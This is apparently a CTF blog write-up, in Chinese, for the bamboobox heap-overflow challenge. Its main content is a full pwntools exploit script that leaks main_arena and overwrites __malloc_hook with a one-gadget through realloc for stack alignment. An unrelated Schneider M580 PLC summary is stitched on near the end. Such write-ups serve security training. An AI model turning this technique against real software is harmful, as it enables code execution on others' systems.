hitcontraining_bamboobox

文章详细描述了一种针对堆溢出漏洞的利用方法,涉及了amd64架构下的Linux环境。首先通过创建和删除堆块来泄露main_arena的地址,然后利用malloc_hook进行攻击,通过精心构造的payload引导执行流经reallocHook到特定gadget,以实现栈对齐和控制程序流程。整个过程展示了复杂的漏洞利用技术和链式调用的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这题漏洞就一个堆溢出,libc是buu常用的那个2.23,所以打法很多。

以上是漏洞出现的函数,同时它还有show功能

from LibcSearcher import *
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/bamboobox' )
#p=remote("node4.buuoj.cn",27153)
p=process('/home/hacker/Desktop/bamboobox' )
def show():
    p.sendlineafter("Your choice:",str(1))

def add(number,content):
    p.sendlineafter("Your choice:",str(2))
    p.sendlineafter("Please enter the length of item name:",str(number))
    p.sendlineafter("Please enter the name of item:",content)

def write(index,number,content):
    p.sendlineafter('Your choice:',str(3))
    p.sendlineafter("Please enter the index of item:",str(index))
    p.sendlineafter("Please enter the length of item name:",str(number))
    p.sendlineafter("Please enter the new name of the item:",content)
def delete(index):
    p.sendlineafter("Your choice:",str(4))
    p.sendlineafter('Please enter the index of item:',str(index))

add(0x10,'a')#0
add(0x10,'a')#1
add(0x70,'a')#2
add(0x10,'b')#3
add(0x60,'c')#4
write(0,100,'\x00'*(0x10+8)+p64(0xa1))
delete(1)
add(0x10,'a')#4
show()

p.recvuntil('2 : ')
main_arena = u64(p.recv(6).ljust(8,'\x00')) - 88
print("main_arena=",hex(main_arena))
malloc_hook_offset = 0x3c4b10
main_arena_offset = 0x3c4b20
libc = main_arena-main_arena_offset
malloc_hook = libc + malloc_hook_offset

build = malloc_hook-0x23
realloc = 0x84710 + libc
realloc_hook = libc + 0x1f7f0

print("realloc_hook:",hex(realloc))
print("build_addr:",hex(build))
delete(4)
write(3,100,'a'*0x10+p64(0)+p64(0x71)+p64(build))
add(0x60,'a')
add(0x60,'a')#5
gadget = libc + 0x4527a
print("gadget_addr:",hex(gadget))
write(5,100,'a'*11 + p64(gadget) + p64(realloc+6))

p.sendlineafter("Your choice:",str(2))
p.sendlineafter("Please enter the length of item name:",str(0x10))

p.interactive()

我的leak方法是先用两个堆块伪造一个大堆块将其free掉放入unsortedbin中,然后将两个中的第一个堆块add回来,这个时候就可以发现另一个堆块同时在allocated和unsortedbins中,直接show,就可以导出main_arena的地址。

然后就是malloc_hook攻击,构造好之后,会发现一个问题,执行不了所有的gadget,因为栈没有对齐,这个时候,我们就需要思考realloc_hook和malloc_hook的联用。

执行手法是是在malloc_hook中放入realloc+?的地址,再在realloc_hook中放入gadget,这样就能形成malloc->malloc_hook->realloc->realloc_hook->gadget,至于为什么要这样,是因为realloc的地方有很多push操作可以帮助栈对齐,?地址怎么出来,最好的方法就是一个一个试,如果手动调试,压栈的时候会出现变化,但是一个一个试之前,需要保证调试能进入gadget。

内容概要:本文详细介绍了施耐德M580系列PLC的存储结构、系统硬件架构、上电写入程序及CPU冗余特性。在存储结构方面,涵盖拓扑寻址、Device DDT远程寻址以及寄存器寻址三种方式,详细解释了不同类型的寻址方法及其应用场景。系统硬件架构部分,阐述了最小系统的构建要素,包括CPU、机架和模块的选择与配置,并介绍了常见的系统拓扑结构,如简单的机架间拓扑和远程子站以太网菊花链等。上电写入程序环节,说明了通过USB和以太网两种接口进行程序下载的具体步骤,特别是针对初次下载时IP地址的设置方法。最后,CPU冗余部分重点描述了热备功能的实现机制,包括IP通讯地址配置和热备拓扑结构。 适合人群:从事工业自动化领域工作的技术人员,特别是对PLC编程及系统集成有一定了解的工程师。 使用场景及目标:①帮助工程师理解施耐德M580系列PLC的寻址机制,以便更好地进行模块配置和编程;②指导工程师完成最小系统的搭建,优化系统拓扑结构的设计;③提供详细的上电写入程序指南,确保程序下载顺利进行;④解释CPU冗余的实现方式,提高系统的稳定性和可靠性。 其他说明:文中还涉及一些特殊模块的功能介绍,如定时器事件和Modbus串口通讯模块,这些内容有助于用户深入了解M580系列PLC的高级应用。此外,附录部分提供了远程子站和热备冗余系统的实物图片,便于用户直观理解相关概念。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值